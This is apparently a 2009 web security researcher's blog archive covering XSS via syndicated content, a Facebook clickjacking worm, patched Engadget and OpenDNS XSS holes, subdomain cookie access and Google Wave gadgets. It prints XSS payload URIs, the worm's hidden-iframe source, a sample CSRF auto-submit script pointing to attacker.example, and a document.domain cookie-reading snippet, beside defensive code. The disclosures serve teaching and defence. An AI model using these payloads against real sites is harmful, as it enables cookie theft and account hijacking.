Dec. 8, 2009

Posted in General, Google | 4 comments

Security in Syndicated and Federated Systems

In an amusing story earlier this year, a technology news reporter writing on a particular security problem unwittingly demonstrated the issue by publishing an article. ReadWriteWeb posted a story on cross-site scripting holes on McAfee’s web site, and the article included some sample code that could be used in an attack. Unfortunately, the New York Times syndicates some articles from RWW, including this one on XSS, and at the time did not filter code in RWW reports. Consequently, the sample code actually rendered in the New York Times version of the article, producing another example of cross-site scripting.

In broad strokes, a syndicated system is one in which an application or network loads content from another (one-way), while a federated system involves two applications or networks exchanging content in a fully interoperable fashion (two-way). RSS is a syndicated setup – your reader simply loads an XML feed from the site you subscribe to. E-mail is a federated system – many SMTP servers exchange messages with each other.

Both syndicated and federated systems have to deal with a potential security problem: outside content. Any time you load data (particularly in a web application) that’s not under your control, you need to put in filters to avoid such issues as cross-site scripting. The problem here is not a matter of trust – I’m sure the New York Times considered ReadWriteWeb a trusted source. The problem is that other sources of content may not always provide what your application is expecting. Rather than assume the data’s formatted and encoded correctly, assume it’s not and take appropriate action. This is merely one example of the type of thinking security researchers routinely employ – and a mindset developers need to use more often.
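
As a small illustration of that mindset, here is a sketch of treating syndicated content as untrusted before it ever reaches the page. The feed item fields and function names are hypothetical, not any particular site’s code:

// Sketch: treat every syndicated field as untrusted, even when it comes
// from a "trusted" partner. (Item fields here are hypothetical.)
function escapeHtml(untrusted) {
    return String(untrusted)
        .replace(/&/g, '&amp;')
        .replace(/</g, '&lt;')
        .replace(/>/g, '&gt;')
        .replace(/"/g, '&quot;')
        .replace(/'/g, '&#39;');
}

function renderSyndicatedItem(item) {
    var container = document.createElement('div');
    var title = document.createElement('h3');
    // textContent never parses HTML, so an embedded <script> tag stays inert
    title.textContent = item.title;
    var body = document.createElement('p');
    // if markup must be built as a string, escape it first
    body.innerHTML = escapeHtml(item.summary);
    container.appendChild(title);
    container.appendChild(body);
    return container;
}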

I recently came across another minor example of syndication leading to XSS. The search engine Cuil recently announced that they were launching an opt-in feature to index the posts of your friends on Facebook and include those posts in your search results. Aside from the privacy ramifications (you may be surprised to learn that settings for uninstalled apps and Facebook Connect sites don’t seem to apply to Cuil’s search results), I wondered how secure Cuil’s implementation would be in practice.

Overall, the feature seems to work like most Facebook Connect sites, and thus poses no inherent security problems. However, I quickly found that Cuil was not encoding the results from Facebook. That is, a friend could post a status saying, “testing <script>alert(document.cookie)</script>” and searching for “testing” in Cuil would load the alert dialog. Obviously the impact of such an attack would be minimal, as it requires jumping through a few hoops first, but it again illustrates accidental XSS via syndicated content. Note that XSS in a Facebook Connect application would open the door to a FAXX-style attack.

An example of a federated system that causes me some concern is Google Wave. When I first started looking at Google Wave from a security standpoint, I admit that I did not fully understand the architecture of the product. In essence, Wave includes two distinct components – a server and a client. On the server end, Wave is an XMPP service that can communicate with any compatible setup. On the client side, Wave is the web interface hosted at wave.google.com for loading messages from servers.

Once I understood this division, I thought it even more important to discuss the security implications of gadgets within waves. I fully expect Google to address most, if not all, of the issues I raised regarding gadgets. (In fact, last time I checked, it appeared they had changed the domains of container iframes, stopping cross-gadget access.) But if Wave really does catch on, Google’s client interface will not be the only one on the market. Since gadgets render as HTML/CSS/JavaScript, Wave clients will almost assuredly include some sort of web browser component. If the company that invented Wave did not factor some of the security considerations I and others have noted into its original client, there’s a good chance other developers will overlook similar issues unless people raise awareness.
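
To make that concrete, here is a rough sketch of how a third-party Wave client might isolate gadget iframes on a domain entirely separate from its own. The hostname, element ID, and function name are hypothetical, not Google’s actual implementation:

// Sketch: render an untrusted gadget in an iframe served from a separate,
// throwaway domain. "gadget-sandbox.example" and "wave-view" are made-up
// names; gadgetId is assumed to be a safe DNS-label identifier.
function embedGadget(gadgetId) {
    var frame = document.createElement('iframe');
    // Because this origin shares no domain with the client itself,
    // same-origin policy keeps the gadget's scripts from reading the
    // client page, its cookies, or other gadgets' frames.
    frame.src = 'https://' + gadgetId + '.gadget-sandbox.example/render';
    frame.width = '100%';
    frame.height = '300';
    document.getElementById('wave-view').appendChild(frame);
}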

However, security in Wave clients deals with only one direction of a federated system. I’m still wondering how certain aspects of federated waves will work in practice. For instance, from what I understand, each thread of messages in Wave will be stored on the server hosting the thread. What will happen if that server becomes suddenly unavailable? How will corporate record-keeping and e-discovery work? And while Google’s Wave servers will likely be quite secure, what about other servers?

Granted, some questions about Wave servers could be raised about similar systems, such as e-mail. But several of the decentralized aspects of Wave distinguish it from a typical e-mail setup, and could prove to be good experiments in light of proposals for decentralized social networking. I’ve long supported the idea of distributed social networking, but also felt it could lead to many performance and usability problems not found in a walled garden (I’ve been meaning to write a blog post entitled “In Defense of Walled Gardens” for at least a year). Wave may be one of the first large-scale attempts at building a distributed application somewhat akin to social networking.

Nov. 23, 2009

Posted in Facebook | 10 comments

Facebook Worm Uses Clickjacking in the Wild

Reports have been spreading today of a new Facebook worm that posts a link to the infection page on people’s profiles. The infection page itself includes a button that users are told to click, with the promise of seeing “something hot” or dominating FarmVille. Nick FitzGerald at AVG posted a walkthrough of the worm (warning: slightly NSFW image), and when explaining how the worm operated, gave an explanation similar to that of other articles I saw:

A sequence of iframes on the exploit page call a sequence of other pages and scripts, eventually resulting in a form submission to Facebook “as if” the victim had submitted a URL for a wall post and clicked on the “Share” button to confirm the post.

With all due respect to FitzGerald and others, I was suspicious. First, I know from experience what sort of CSRF protections Facebook has put in place. Second, if this were truly just CSRF, why not execute the attack on loading the page instead of requiring a second click?
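
For context, a plain CSRF attack needs no interaction at all: a malicious page can build and auto-submit a cross-site form the moment it loads, so a required click is itself a hint that something else is going on. Here is a sketch of what a click-free CSRF attempt would look like; the action URL and field name are made up, and a request-specific anti-CSRF token is exactly what defeats this approach:

// Sketch of a click-free CSRF attempt (hypothetical URL and field name).
window.addEventListener('load', function () {
    var form = document.createElement('form');
    form.method = 'POST';
    form.action = 'https://victim-site.example/share';  // forged target
    var field = document.createElement('input');
    field.type = 'hidden';
    field.name = 'url';
    field.value = 'http://attacker.example/worm';
    form.appendChild(field);
    document.body.appendChild(form);
    form.submit();  // fires on page load -- no user click required
});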

I do know of one relative of CSRF attacks (some classify it as simply CSRF, but I do see a distinction) that requires another click, and that’s clickjacking. I decided to check out an infection page to see exactly what was going on.

Sure enough, both the “hot” and “dominate FarmVille” pages load an invisible iframe, which calls another local page, which in turn loads another invisible iframe. The actual source of the second local page looks like this (URI edited):

<html><head></head><body><div style="overflow: hidden; width: 56px; height: 24px; position: relative;" id="div">
<iframe name="iframe" src="http://EVILURI/index.php?n=632" style="border: 0pt none; left: -985px; top: -393px; position: absolute; width: 1618px; height: 978px;" scrolling="no"></iframe></div></body></html>

The address that the iframe loads simply redirects to a Facebook share page with the infection page specified as the share link. Note that the style attribute on the iframe includes negative values for “left” and “top” – this ensures that when the page loads, the “Share” button for the Facebook page is at the top-left corner of the iframe, and thus positioned right underneath the button users think they are clicking.
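
On the defensive side, the standard countermeasures are frame-busting scripts and the newer X-Frame-Options response header. A minimal sketch of the former follows; simple frame-busting can itself be circumvented, so treat this as illustrative rather than a complete defense:

// Minimal frame-busting sketch: if this page finds itself inside a frame,
// break out to the top-level window so a hidden-iframe overlay fails.
if (window.top !== window.self) {
    window.top.location = window.self.location;
}
// Sites can also send an X-Frame-Options response header (e.g. "DENY")
// so that supporting browsers refuse to render the page in a frame at all.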

It’s perhaps worth noting that the possibility of such a worm has been pointed out before, including on this blog:

All of the following actions can be mistakenly performed by a user simply clicking a link or button on an innocent-looking page via clickjacking:

Post a link to your profile. This is possible by applying clickjacking to several Facebook pages used for sharing content. A custom title and description can be set for the link. Other content, such as a Flash video, can also be posted this way.

I also encouraged Facebook in my Month of Facebook Bugs Report to take clickjacking seriously. The behavior of this worm is only the beginning – as I’ve pointed out for months, a similar attack could authorize a Facebook application (malicious or hijacked) and steal user information while spreading links even more virally. This new worm may be one of the first examples of clickjacking used in the wild, but it certainly won’t be the last.

Nov. 21, 2009

Posted in General | No comments

XSS in Engadget’s New Site

I’m noticing a trend of sites patching the more obvious cross-site scripting vectors, such as search fields, but ignoring parameters in secondary pages, such as Ajax interfaces. Several applications in the Month of Facebook Bugs had pages for making Ajax calls or loading advertisements that were never meant to be loaded directly, yet doing so opened the door to XSS attacks. Keep in mind that any page on a given domain can access that domain’s cookies.

Yet another case in point came to my attention this week. I noticed that the technology news site Engadget had launched a redesign, and I began poking around the new site. After a little while, I came across four XSS vulnerabilities, all on the main www.engadget.com domain. I promptly reported the holes, and they were silently patched within a day or two. Since they’ve all been fixed, I’ll list the example URIs I sent here for the record:

  • http://www.engadget.com/?a=ajax-comment-vote&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-show-replies&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/?a=ajax-comment-report&commentid=%3Cscript%3Ealert(document.cookie)%3C/script%3E
  • http://www.engadget.com/mm_track/Engadget/media/?title=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Previously, each of these pages executed the injected script, bringing up an alert dialog containing the user’s cookies for Engadget. Kudos to the team behind Engadget for the quick fixes, and hopefully this will serve as another reminder to all developers to leave no page unchecked when evaluating security issues.
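
The fix for endpoints like these is straightforward: validate or encode every reflected parameter, even on pages never meant to be loaded directly. A hedged sketch (illustrative only, not Engadget’s actual code):

// Sketch: an Ajax endpoint should never echo a request parameter as-is.
// An identifier that should be numeric can simply be validated; free-form
// values should be HTML-encoded on output, as shown earlier.
function safeCommentId(raw) {
    return /^\d+$/.test(raw) ? raw : null;  // reject anything but digits
}

// safeCommentId('12345')                                   -> '12345'
// safeCommentId('<script>alert(document.cookie)</script>') -> null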

Nov. 16, 2009

Posted in General | 2 comments

Real-Life Examples of Cross-Subdomain Issues

About two weeks ago, security researcher Mike Bailey posted a paper on cookie attacks via subdomains (hat tip: Jeremiah Grossman). I’ve seen several stories since then dealing with various subdomain security issues. In fact, the day after Bailey’s write-up, Yvo Schaap described several cases where Facebook and MySpace inadvertently exposed data through trust policies on particular subdomains.

I bring up subdomains to highlight two important considerations for developers. First, never ignore code hosted on subdomains. Your primary site may be secure, but vulnerabilities on one of your subdomains could still open you up to attacks. Second, make sure you understand how browsers handle subdomains. While subdomains are generally treated as separate from their parent domain, remember that changing document.domain can allow code to move up the DNS chain.

While Schaap illustrated the first point already, I can add one more example. A few weeks ago, I poked around a few OpenDNS pages and noticed an oversight similar to some of the FAXX hacks I’d seen in September: an AJAX interface called directly rendered a good bit of HTML. While most parameters were filtered, I did come across one that could be used to render injected code. The vulnerable page was hosted on guide.opendns.com, a subdomain used for presenting search results: http://guide.opendns.com/ajax_serp.php?q=&oq=><script src%3Dhttps://theharmonyguy.com/opendns.js></script>

OpenDNS patched this hole quickly after I disclosed it to them, and I doubt it would have had much serious impact. Any important cookies appear to be attached to www.opendns.com, which would not be accessible, and trying to change network properties would require accessing OpenDNS pages over HTTPS (requests the browser would thus block).

I came across a striking example of my second point while reading about a new Twitter widget. A ReadWriteWeb reader commented that users of NetVibes, a custom home page service, could make use of the widgets by inserting them into an HTML widget available on NetVibes. I knew that the Twitter widgets required JavaScript, so I started testing NetVibes widgets in much the same way I looked at Google Wave gadgets.

Sure enough, NetVibes allowed JavaScript and iframes to be inserted into their widgets, though the widgets again render in container iframes. More troublesome, though, is that these container iframes do not load from an entirely separate domain – they load from a subdomain of netvibes.com. Within minutes, I changed document.domain to netvibes.com and loaded the cookies associated with that domain. Thankfully, my login cookies appear to be tied only to www.netvibes.com, and attempts to load pages at URIs that don’t include “www” get forwarded to www.netvibes.com pages. Still, as much as I’ve criticized Google Wave’s gadget implementation, at least Google used a domain entirely separate from google.com for their gadgets. Finally, I would note that I could add potentially malicious NetVibes widgets to publicly accessible NetVibes pages, leading to persistent XSS issues.
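
For readers unfamiliar with the mechanism, document.domain relaxation works roughly like this; the hostnames below are generic examples, not NetVibes’ actual setup:

// Sketch of document.domain relaxation (generic example hostnames).
// Page A, served from widgets.example.com, relaxes its origin:
document.domain = 'example.com';

// Page B, on www.example.com, must opt in the same way:
//     document.domain = 'example.com';

// Once both have relaxed, script in page A that holds a reference to
// page B's window (say, a parent frame) can reach into it:
var parentDoc = window.parent.document;   // allowed after relaxation
console.log(parentDoc.cookie);            // page B's cookies, DOM, etc.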

As Bailey pointed out in his paper, “DNS was never intended to be a security feature.” Even with protections such as same-origin policies, I get a bit leery at times about how thin the walls preventing certain attacks can become. When building secure web applications, remember your subdomains and how they relate to each other.

Nov. 5, 2009

Posted in General, Google | 2 comments

Why I Started Hacking Google Wave

After I posted concerns over security in Google Wave, several responses came (including one from Google) emphasizing that Wave was “still in an early preview stage” and many bugs would be fixed before a wider release. I think that clarifying why I would bother discussing bugs in a preview product may raise a few important points about web application security.

First, let me be clear about one point: I would not pretend to know more about application security than the engineers, programmers, and scientists at Google. In addition, I would not want to imply that Google does not care about security or user privacy. I realize that Google takes security issues seriously and has the resources to build highly secure products.

But those realizations are also a source of confusion for me when I observe decisions made about Google Wave. As an outsider, I don’t understand why Wave would include the problems I’ve outlined. What I’ve posted does not involve clever hacks or specific parameters – these problems involve weaknesses in the overall framework of Wave. And such weaknesses relate to well-known issues in application security. In fact, Google has previously addressed deploying third-party code by developing Caja after the launch of OpenSocial.

Returning to the “it’s a preview” argument, though, I would first respond by saying that applications, particularly ones that allow users to embed untrusted third-party code, should include security from the very beginning. Starting with an open model and trying to add restrictions later on is a recipe for disaster.

A larger issue in Wave’s case, though, is that Google has often cast Wave as a reinvention of SMTP e-mail. If you set expectations high, much will be expected of you. If a company with the reputation, resources, and revenue of Google markets a product as a replacement for traditional e-mail, I’m going to evaluate its security even more closely than normal. In my view, the hype that has already built around Wave and the reach it’s already found (Novell is reportedly planning a Wave-based business product in mid-2010) disallow the “preview” excuse.

In addition, if you’re going to reinvent e-mail, don’t forget lessons already learned from traditional e-mail. In a previous post, I outlined four major weaknesses I saw in Google Wave:

  1. Allowing scripts and iframes in gadgets with no limits apart from sandboxing
  2. Lack of control over what content or users can be added to a wave
  3. No simple mechanism for verifying gadget sources or features
  4. Automatically loading gadgets when a wave is viewed

Name one webmail interface that executes scripts in messages. Name one recent e-mail client that automatically loads content such as images in messages. Why were such considerations not part of Wave from the very start?

Of course, while Google has at least promised to include further permissions controls in Wave, such controls are one aspect of Wave intentionally left out of the initial releases. One can debate the merits of such open collaboration, but I’m a bit surprised that more of the security implications have not been raised before (at least not to my knowledge). When such changes will appear, though, remains to be seen. Personally, I find it a tad disconcerting that Google has similarly promised such updates as allowing users to turn off Wave’s real-time typing behavior, yet Wave has changed little since its announcement.

Still, I’m confident that Google will address at least some of the issues I’ve raised. If nothing else, I hope I’ve contributed to the public dialogue about Google Wave. I will add that Wave appears to include much security on the backend – most of the problems I’m seeing come in the client implementation. Let’s remember, though, that Wave will be federated. Another reason to bring up client security issues early is that other clients can learn from Google’s implementation. I’m rather concerned that if Wave interfaces proliferate, they may repeat many of the security problems seen in early e-mail interfaces.

I’m also concerned that Wave is not really addressing many of the issues that have plagued e-mail. The current “chaos” with Wave’s lack of permissions does not bode well for how it will handle spam, for instance. Whitelisting alone won’t do the trick. In fact, I would argue that Wave is a collaboration tool, not a communication tool, and thus not a replacement for e-mail.

In conclusion, I’d simply add one more point. While it’s exciting to find exploits such as specific XSS holes on a web site, it’s often more important to raise awareness regarding larger security issues that relate to the overall framework of an application. That’s why I’ve discussed FAXX hacks so much, as they relate to the overall implementation of the Facebook Platform instead of particular vulnerabilities.

Similarly, my concerns about Google Wave thus far involve behaviors built into the current system that open the door for exploiting the privacy and security of users. Preview or not, Wave needs to address these high-level weaknesses if it’s going to match the hype.
